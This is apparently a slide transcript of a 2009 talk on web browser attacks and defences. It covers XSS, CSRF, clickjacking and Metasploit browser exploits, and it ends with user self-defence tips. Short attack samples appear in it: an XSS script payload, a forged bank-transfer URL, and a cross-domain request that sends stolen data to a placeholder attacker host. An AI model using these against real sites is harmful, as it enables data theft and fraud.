The 5 Ps of Preparedness - Hope is Not a Strategy [1].pdf
The 5 Ps of Preparedness - Hope is Not a Strategy [1].pdfThe 5 Ps of Preparedness - Hope is Not a Strategy [1].pdf
The 5 Ps of Preparedness - Hope is Not a Strategy [1].pdfRafal Los
 
Irrational But Effective - Applying Parenthood Lessons to Cyber Security
Irrational But Effective - Applying Parenthood Lessons to Cyber SecurityIrrational But Effective - Applying Parenthood Lessons to Cyber Security
Irrational But Effective - Applying Parenthood Lessons to Cyber SecurityRafal Los
 
SAINTCON 21 - Of Sandcastles and Luck (Fixing Vulnerability Management)
SAINTCON 21 - Of Sandcastles and Luck (Fixing Vulnerability Management)SAINTCON 21 - Of Sandcastles and Luck (Fixing Vulnerability Management)
SAINTCON 21 - Of Sandcastles and Luck (Fixing Vulnerability Management)Rafal Los
 
Strategies and Tactics for Effectively Managing Vulnerabilities in Diverse En...
Strategies and Tactics for Effectively Managing Vulnerabilities in Diverse En...Strategies and Tactics for Effectively Managing Vulnerabilities in Diverse En...
Strategies and Tactics for Effectively Managing Vulnerabilities in Diverse En...Rafal Los
 
Lies, Fables and Security Metrics
Lies, Fables and Security MetricsLies, Fables and Security Metrics
Lies, Fables and Security MetricsRafal Los
 
Losing battles, winning wars
Losing battles, winning warsLosing battles, winning wars
Losing battles, winning warsRafal Los
 
5 Things CFOs Need to Know About Enterprise Security - HP CFO Summit 2013
5 Things CFOs Need to Know About Enterprise Security - HP CFO Summit 20135 Things CFOs Need to Know About Enterprise Security - HP CFO Summit 2013
5 Things CFOs Need to Know About Enterprise Security - HP CFO Summit 2013Rafal Los
 
Operationalizing Security Intelligence [ InfoSec World 2014 ]
Operationalizing Security Intelligence [ InfoSec World 2014 ]Operationalizing Security Intelligence [ InfoSec World 2014 ]
Operationalizing Security Intelligence [ InfoSec World 2014 ]Rafal Los
 
Operationalizing security intelligence for the mid market - Rafal Los - RSA C...
Operationalizing security intelligence for the mid market - Rafal Los - RSA C...Operationalizing security intelligence for the mid market - Rafal Los - RSA C...
Operationalizing security intelligence for the mid market - Rafal Los - RSA C...Rafal Los
 
Rebooting the Enterprise Security Program for Defensibility - ISSA Internatio...
Rebooting the Enterprise Security Program for Defensibility - ISSA Internatio...Rebooting the Enterprise Security Program for Defensibility - ISSA Internatio...
Rebooting the Enterprise Security Program for Defensibility - ISSA Internatio...Rafal Los
 
Cloud Security Alliance- Challanges of an elastic environment v8a [public]
Cloud Security Alliance- Challanges of an elastic environment v8a [public]Cloud Security Alliance- Challanges of an elastic environment v8a [public]
Cloud Security Alliance- Challanges of an elastic environment v8a [public]Rafal Los
 
Threat modeling the security of the enterprise
Threat modeling the security of the enterpriseThreat modeling the security of the enterprise
Threat modeling the security of the enterpriseRafal Los
 
Making Measurable Gains - Contextualizing 'Secure' in Business
Making Measurable Gains - Contextualizing 'Secure' in BusinessMaking Measurable Gains - Contextualizing 'Secure' in Business
Making Measurable Gains - Contextualizing 'Secure' in BusinessRafal Los
 
Security BSides Atlanta - "The Business Doesn't Care..."
Security BSides Atlanta - "The Business Doesn't Care..."Security BSides Atlanta - "The Business Doesn't Care..."
Security BSides Atlanta - "The Business Doesn't Care..."Rafal Los
 
Software Security Assurance - Program Building (You're going to need a bigger...
Software Security Assurance - Program Building (You're going to need a bigger...Software Security Assurance - Program Building (You're going to need a bigger...
Software Security Assurance - Program Building (You're going to need a bigger...Rafal Los
 
The Future of Software Security Assurance
The Future of Software Security AssuranceThe Future of Software Security Assurance
The Future of Software Security AssuranceRafal Los
 
Defying Logic - Business Logic Testing with Automation
Defying Logic - Business Logic Testing with AutomationDefying Logic - Business Logic Testing with Automation
Defying Logic - Business Logic Testing with AutomationRafal Los
 
Ultimate Hack! Layers 8 & 9 of the OSI Model
Ultimate Hack! Layers 8 & 9 of the OSI ModelUltimate Hack! Layers 8 & 9 of the OSI Model
Ultimate Hack! Layers 8 & 9 of the OSI ModelRafal Los
 
Into the Rabbithole - Evolved Web App Security Testing (OWASP AppSec DC)
Into the Rabbithole - Evolved Web App Security Testing (OWASP AppSec DC)Into the Rabbithole - Evolved Web App Security Testing (OWASP AppSec DC)
Into the Rabbithole - Evolved Web App Security Testing (OWASP AppSec DC)Rafal Los
 
Oh No They Didn't! 7 Web App Security Stories (v1.0)
Oh No They Didn't! 7 Web App Security Stories (v1.0)Oh No They Didn't! 7 Web App Security Stories (v1.0)
Oh No They Didn't! 7 Web App Security Stories (v1.0)Rafal Los
 

Plus de Rafal Los (20)

The 5 Ps of Preparedness - Hope is Not a Strategy [1].pdf
The 5 Ps of Preparedness - Hope is Not a Strategy [1].pdfThe 5 Ps of Preparedness - Hope is Not a Strategy [1].pdf
The 5 Ps of Preparedness - Hope is Not a Strategy [1].pdf
 
Irrational But Effective - Applying Parenthood Lessons to Cyber Security
Irrational But Effective - Applying Parenthood Lessons to Cyber SecurityIrrational But Effective - Applying Parenthood Lessons to Cyber Security
Irrational But Effective - Applying Parenthood Lessons to Cyber Security
 
SAINTCON 21 - Of Sandcastles and Luck (Fixing Vulnerability Management)
SAINTCON 21 - Of Sandcastles and Luck (Fixing Vulnerability Management)SAINTCON 21 - Of Sandcastles and Luck (Fixing Vulnerability Management)
SAINTCON 21 - Of Sandcastles and Luck (Fixing Vulnerability Management)
 
Strategies and Tactics for Effectively Managing Vulnerabilities in Diverse En...
Strategies and Tactics for Effectively Managing Vulnerabilities in Diverse En...Strategies and Tactics for Effectively Managing Vulnerabilities in Diverse En...
Strategies and Tactics for Effectively Managing Vulnerabilities in Diverse En...
 
Lies, Fables and Security Metrics
Lies, Fables and Security MetricsLies, Fables and Security Metrics
Lies, Fables and Security Metrics
 
Losing battles, winning wars
Losing battles, winning warsLosing battles, winning wars
Losing battles, winning wars
 
5 Things CFOs Need to Know About Enterprise Security - HP CFO Summit 2013
5 Things CFOs Need to Know About Enterprise Security - HP CFO Summit 20135 Things CFOs Need to Know About Enterprise Security - HP CFO Summit 2013
5 Things CFOs Need to Know About Enterprise Security - HP CFO Summit 2013
 
Operationalizing Security Intelligence [ InfoSec World 2014 ]
Operationalizing Security Intelligence [ InfoSec World 2014 ]Operationalizing Security Intelligence [ InfoSec World 2014 ]
Operationalizing Security Intelligence [ InfoSec World 2014 ]
 
Operationalizing security intelligence for the mid market - Rafal Los - RSA C...
Operationalizing security intelligence for the mid market - Rafal Los - RSA C...Operationalizing security intelligence for the mid market - Rafal Los - RSA C...
Operationalizing security intelligence for the mid market - Rafal Los - RSA C...
 
Rebooting the Enterprise Security Program for Defensibility - ISSA Internatio...
Rebooting the Enterprise Security Program for Defensibility - ISSA Internatio...Rebooting the Enterprise Security Program for Defensibility - ISSA Internatio...
Rebooting the Enterprise Security Program for Defensibility - ISSA Internatio...
 
Cloud Security Alliance- Challanges of an elastic environment v8a [public]
Cloud Security Alliance- Challanges of an elastic environment v8a [public]Cloud Security Alliance- Challanges of an elastic environment v8a [public]
Cloud Security Alliance- Challanges of an elastic environment v8a [public]
 
Threat modeling the security of the enterprise
Threat modeling the security of the enterpriseThreat modeling the security of the enterprise
Threat modeling the security of the enterprise
 
Making Measurable Gains - Contextualizing 'Secure' in Business
Making Measurable Gains - Contextualizing 'Secure' in BusinessMaking Measurable Gains - Contextualizing 'Secure' in Business
Making Measurable Gains - Contextualizing 'Secure' in Business
 
Security BSides Atlanta - "The Business Doesn't Care..."
Security BSides Atlanta - "The Business Doesn't Care..."Security BSides Atlanta - "The Business Doesn't Care..."
Security BSides Atlanta - "The Business Doesn't Care..."
 
Software Security Assurance - Program Building (You're going to need a bigger...
Software Security Assurance - Program Building (You're going to need a bigger...Software Security Assurance - Program Building (You're going to need a bigger...
Software Security Assurance - Program Building (You're going to need a bigger...
 
The Future of Software Security Assurance
The Future of Software Security AssuranceThe Future of Software Security Assurance
The Future of Software Security Assurance
 
Defying Logic - Business Logic Testing with Automation
Defying Logic - Business Logic Testing with AutomationDefying Logic - Business Logic Testing with Automation
Defying Logic - Business Logic Testing with Automation
 
Ultimate Hack! Layers 8 & 9 of the OSI Model
Ultimate Hack! Layers 8 & 9 of the OSI ModelUltimate Hack! Layers 8 & 9 of the OSI Model
Ultimate Hack! Layers 8 & 9 of the OSI Model
 
Into the Rabbithole - Evolved Web App Security Testing (OWASP AppSec DC)
Into the Rabbithole - Evolved Web App Security Testing (OWASP AppSec DC)Into the Rabbithole - Evolved Web App Security Testing (OWASP AppSec DC)
Into the Rabbithole - Evolved Web App Security Testing (OWASP AppSec DC)
 
Oh No They Didn't! 7 Web App Security Stories (v1.0)
Oh No They Didn't! 7 Web App Security Stories (v1.0)Oh No They Didn't! 7 Web App Security Stories (v1.0)
Oh No They Didn't! 7 Web App Security Stories (v1.0)
 

Dernier

Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 

Dernier (20)

Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 

Total Browser Pwnag3 V1.0 Public

  • 1. Total Browser Pwnag3 Joshua D. Abraham Rafal M. Los Security Expert Sr. Security Strategist 1 12 March 2009
  • 2. Talk Overview 2 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
  • 3. Disclaimer 3  We are trained professionals with over 15 years combined experience in these matters – it goes without saying – don‟t try this at home! If you attempt anything you see today you may be subject to any number of locally applicable laws resulting in fines or imprisonment.  Knowledge is power – please use it responsibly 12 March 2009
  • 4. Talk Overview 4 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
  • 5. WorldWideWeb Evolved 5  Where browsers started Remember gopher?  Text-based way to retrieve Internet-stored information  First web browser was “WorldWideWeb” (Feb. 26, 1991)  Sir Tim Berners-Lee   Capable of displaying style-sheets, and media supported by the NeXT system  First program to use HTTP (Hypertext Transfer Protocol) invented by Berners-Lee in 1989  HTTP was a leap forward and a move from text  graphical “browsing” Flurry of development activity culminated in Mosaic  Great history of the web on W3 (http://www.w3.org/History.html)  12 March 2009
  • 6. WorldWideWeb Evolved 6 Taken from Wikipedia: http://en.wikipedia.org/wiki/Timeline_of_web_browsers 12 March 2009
  • 7. WorldWideWeb Evolved 7  What happened along the way 2 main browser foundations  Lynx (text-based browser for the terminal)   Mosaic foundation for most modern browsers  Spawned Netscape  Mozilla branch  Spawned MS Internet Explorer branch  Several “boutique” browsers including…  OmniWeb, iCab, w3m, Tamaya, Opera Arachne Browsers all adhere [loosely] to the HTML-spec  Currently on version 5 DRAFT   http://dev.w3.org/html5/spec/Overview.html  Many “proprietary” technologies in browsers  Microsoft‟s ActiveX… only works in MSIE 12 March 2009
  • 8. WorldWideWeb Evolved 8  Modern web browsers and content  Modern browsing Simple HTML has evolved into RIA   Synchronous to asynchronous browsing  Cross-platform support of media and content Aren‟t there Standards?  HTML standards aren‟t followed 100%   HTML-spec focused on features, not security The browser, over-extended  Browsers today are doing more than they were intended to   Features/functions are at odds with good security  … this creates a problem 12 March 2009
  • 9. WorldWideWeb Evolved 9  Evolution of HTML Specification  Start: HTML v1 Very simple   Basic layout and rendering of static content Evolved: HTML v5 (draft)  Extremely complex   Rich user-experience  Supported embedded content, media and interactive elements Complexity is the enemy of security  More complex structures create possibility for exploitation   Functionality at the sacrifice of security Security is an afterthought…  12 March 2009
  • 10. WorldWideWeb Evolved 10  Hacking a standard  (current) HTML-spec is flawed  Exploitation is possible  NO “fix” is available  ClickJacking… more than a theoretical attack…  DEMO 12 March 2009
  • 11. Talk Overview 11 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
  • 12. Square Browser, Round Hole 12  Delivering content of HTTP  HyperText Transfer Protocol  Current version HTTP/1.1, RFC 2616 (http://tools.ietf.org/html/rfc2616)  Published in June 1999  WikiPedia: http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol   Clearly outdated  Never really intended to be session-aware  Request/Response synchronous framework  Modern “browsers” use HTTP as an interactive protocol 12 March 2009
  • 13. Square Browser, Round Hole 13  Several reasons browsers are over-extended  User-state tracking HTML-spec initially had no notion of “state”   Bolt-on as pages turned to applications Highly interactive “applications” (RIA, etc)  Browser meant to render static content   Browsers never meant to house applications Synchronous vs. Asynchronous requests  HTTP-spec built around client single request/response   Asynchronicity creates gaping security issues …and there are more  12 March 2009
  • 14. Square Browser, Round Hole 14  Tracking state  State-management a browser “afterthought”  Browser not meant to handle persistent sessions with server  Goes against foundational principles of “browser” technology  User state tracked in various ways  Cookie Piece of persistent code stored on your computer  Parameter  Variable inside the browser session   In the URI, inside POST, or other method Client-side… so it can be manipulated, lost or stolen  …and then it gets complicated  12 March 2009
  • 15. Square Browser, Round Hole 15  Highly interactive applications  Browser intended to render server response (pages)  Browser not intended for real-time interactivity with user  Functions to enable Rich Internet Applications (RIA) shoe- horned into the browser Microsoft‟s ActiveX, Silverlight   Java Applets (DEMO later)  Adobe Flash, AIR  AJAX frameworks  Browser plug-ins  Firefox add-ons (Keylogger DEMO)  MS IE BHOs (browser-helper objects) The Browser is too complex for its own good  12 March 2009
  • 16. Square Browser, Round Hole 16  Java Applet Attack (“Single Click of Death”)  Self Signed  Execute code anywhere Windows  Linux  Mobile devices   OS Detection  ~DEMO~ 12 March 2009
  • 17. Square Browser, Round Hole 17  Synchronous vs. Asynchronous requests  Browser spec built around user click (request)  response User requests page, server returns page and embedded objects  Functionality necessitated evolution  Full-page refresh on every mouse click/load was annoying to users   Methods for automating object loads (requests) created (AJAX)  Browser can now fetch requests on user‟s behalf…  …and without the user‟s knowledge Security issues arise  Differentiate between script & user requests…  Stop and think… script on a page can request other objects  Great for rich user experience   Scary for security 12 March 2009
  • 18. Square Browser, Round Hole 18  Cookies  Session ID (Used to Authenticate the User)  Username  Password  Expiration (30 minutes)  Single session per login instance  Example:  User opens: https://www.gmail.com  Enters username  Enters complex password  Clicks login… 12 March 2009
  • 19. Square Browser, Round Hole 19  … And the Session ID is transferred securely right??  Maybe not… 12 March 2009
  • 20. Square Browser, Round Hole 20  Session Management  Setting Session IDs within Cookies  Session IDs Sufficient randomness   http://en.wikipedia.org/wiki/FIPS_140-2  Attacks  CSRF  HTTP capture  Surfjack  Session Testing 12 March 2009
  • 21. Square Browser, Round Hole 21  Cross Site Request Forgery (CSRF)  User is logged into bank  Bank website is vulnerable to CSRF  Attacker send user malicious link  User clicks the click and the attacker now is $5000 richer  Examples:  https://bank.com/transfer?amount=5000&toaccount=123 12 March 2009
  • 22. Talk Overview 22 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
  • 23. Pwnag3 – Owning Your Victim 23 Cross-Site Scripting (XSS) Exploit Standards Exploit Exploit Browsers Plugins 12 March 2009
  • 24. Pwnag3 – Owning Your Victim 24  What is Cross Site Scripting?  What are the Types?  DOM-Based  Reflective  Persistent  How do you find XSS?  http://ha.ckers.org/xss.html 12 March 2009
  • 25. Pwnag3 – Owning Your Victim 25  Storage of Malicious JavaScript in the database Example: Administrative Log Page  Reads username from DB for a failed login attempt   Write the result to the an administrative log …  What if we enter:  <script>alert(„XSS‟)</script> as the username???  Input from the DB written to the page 12 March 2009
  • 26. Pwnag3 – Owning Your Victim 26 Attacker inserts Javascript • Ex: document.write(„<script>alert(„XSS‟)</script>‟); Browser writes the Javascript to the DOM Javascript is rendered Client Pwn3d 12 March 2009
  • 27. Pwnag3 – Owning Your Victim 27  Ability to perform Client Base attacks  Communication making Exploitation easier Twitter Text Email Message AIM Pwnag3 Facebook 12 March 2009
  • 28. Pwnag3 – Owning Your Victim 28  Attackers have choice!!! Your Your customer‟s Website Website Websites Partner‟s you trust Website 12 March 2009
  • 29. Pwnag3 – Owning Your Victim 29 Steal cookies Redirect to other malicious Key logging content (webpage, exe, pdf etc) XSS Attack vectors Internal Port Steal clipboard scanning Browser Appearance of exploits website defacement (MoBB) 12 March 2009
  • 30. Pwnag3 – Owning Your Victim 30 12 March 2009
  • 31. Pwnag3 – Owning Your Victim 31 Issues Not Fixed Properly  Known Open Redirects Google.com since 2006!  Other sites Yahoo.com, Ask.com, Lycos.com …   Known Instances of XSS  Search Engine for issues (xssed.com)  American Express Not fixed until it is fixed   Theregister.co.uk Social Networking sites  Potential for worms   Everyone remember sammy? 12 March 2009
  • 32. Pwnag3 – Owning Your Victim 32  Browser Exploit Framework (BeEF)  Attacking many clients at once  Stores the results in log files  Ability to add multiple attack vectors  Open Source  Included in BackTrack LiveCD (http://remote-exploit.org)  http://www.bindshell.net/tools/beef/  DEMO 12 March 2009
  • 33. Pwnag3 – Owning Your Victim 33  Metasploit Exploit Framework  Exploits => 305  Payloads => 170  Encoders => 20  Auxiliary modules => 67 12 March 2009
  • 34. Pwnag3 – Owning Your Victim 34 MetaSploit Browser Attacks  Browser Autopwn Flaws in IE  Flaws in Firefox   Malicious Files  Office Documents (doc,xls,ppt)  And PDFs (Adobe browser plugin DEMO)  HTTP / HTTPS capture 12 March 2009
  • 35. Pwnag3 – Owning Your Victim 35  IE XML Corruption Exploit  0day on milw0rm Not reliable  Single OS, single payload  Modifying the payload (manual)   MSFv3 module soon thereafter  Reliable  Multiple payloads  Modifying the payload (easy)  ~DEMO~ 12 March 2009
  • 36. Talk Overview 36 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
  • 37. Searching for Hope 37  Can a web browser be made “secure”?  Can security vulnerabilities be eliminated?  Can standards issues be mitigated?  What are the trade-offs?  More security = less features  Less complexity = more security  Both are contrary to current builds of modern browsers  Try your browser with all plug-ins, scripting, active content, disabled… Welcome back to 1996!  12 March 2009
  • 38. Searching for Hope 38  Brower +  First, define the role of the browser All-in-one render engine?   Plug-in manager? Natively browsers need to render simple content  Standards-based HTML, DHTML, etc   About those plug-ins  Toolbars  BHO (for IE)  Add-ins (for Firefox) 12 March 2009
  • 39. Searching for Hope 39  Internet Explorer 8.0+  Advancements: Internal anti-Cross-Site Scripting (XSS)   Natively attempt to break Type-1 (reflected) attacks  Browser-based “neutering” for XSS prevention Content-sniffing opt-out   Forces browser not to interpret content  URL Highlighting  Base URL is highlighted for user safety/clarity 12 March 2009
  • 40. Searching for Hope 40  Internet Explorer 8.0+  Setbacks Cross-Domain Requests (XDR Object)   Allows Scripts simple way to pass data; effectively breaking same-origin policy XDR Object simplifies cross-domain requests  • var xdr = new XDomainRequest(); xdr.open(quot;POSTquot;, quot;http://www.bad guy.com/quot;); xdr.send(stolenInfo); 12 March 2009
  • 41. Searching for Hope 41  FireFox 3+  Advancements Anti-Phishing/Malware   Full-page browser warning (through Google Safe-Browsing API)  Anti-Phishing updates 48 times/day  Focused on security  Mozilla‟s goal: bolster security in FireFox  Automatic update  Automatically get latest browser updates for maximum security  Pop-up blocker  Block pop-ups with customizable options 12 March 2009
  • 42. Searching for Hope 42  FireFox 3+  Drawbacks Currently leading in disclosed vulnerabilities  … but so far that‟s it.  12 March 2009
  • 43. Searching for Hope 43  Securing HTML-spec? (v5)  Functionality vs. Security Functionality requires complexity   Complexity often causes security issues  Living with exploitable functionality More “exploitable functionality” will be uncovered  HTML v5 is too complex not to have faults   AJAX frameworks continue to add functions/methods  Can increased functionality (RIA) co-exist with the need for security? 12 March 2009
  • 44. Searching for Hope 44  Developer Tools  Helping Enabling faster development of pages and applications   Allowing non-experts to create pages and applications Hurting  More “point and click” development   A single broken development tool accounts for mass breakage  Developers many not understand complexities of what they are doing  Heavy reliance on tools to “do security for you” 12 March 2009
  • 45. Searching for Hope 45  Building a secure browser  What is considered “secure”?  What would need to be sacrificed?  Is it feasible?  A “secure” browser checklist  NoScript-type functionality  Native & effective pop-up blockers  Sessions destroyer(s)  True SSL validation  All features have to be user-friendly 12 March 2009
  • 46. Searching for Hope 46  The secure browser challenge  Even if the browser is 100% bug-free… The spec is broken   Add-ons are exploitable  Malicious add-ons abound  “toolbars”  “plug-ins”  Developers still write buggy code  The standards are too complex to implement 12 March 2009
  • 47. Searching for Hope 47  Is there any hope?  Maybe… Start by fixing the HTML standards   Educate users not to install unknown plug-ins  Educate developers to write better applications/sites  Think twice before adding functionality to your browser Maybe not…  The browser was never meant to do what it does today   Perhaps it‟s time for a revolution… a new tool or ?  Since day 1 we‟ve gotten it wrong consistently  Millions of you have your browsers “infected” or trojaned 12 March 2009
  • 48. Talk Overview 48 WorldWideWeb Evolved The web browser – past to present Square Browser, Round Hole Applications in a web browser window Pwnag3 – Owning Your Victim Total browser pwnag3 Searching for Hope Can a browser be secure? Self-Defense 101 How to protect yourself and your computer Crystal Ball Looking into the future 12 March 2009
  • 49. Self-Defense 101 49  Protecting yourself in “cyberspace”  Know who/what to trust Trust no one (or no site)   Some sites are more trustworthy than others <ahem>  Always be weary of “free” widgets they come with a price  No site deserves your unverified trust  Remember *any* site can be compromised (and likely will) 12 March 2009
  • 50. Self-Defense 101 50  Know where to click  Always (ALT+F4) on pop-up windows Malicious people can change window appearance and behavior of  buttons… never trust buttons! Check link target when you mouse-over a link  Never fall for “scare-tactics”  “Your computer is infected, click here  to install remover utility”  ~100% of those pop-ups are malware Never click links in emails  Even from people you think you trust… you never know  12 March 2009
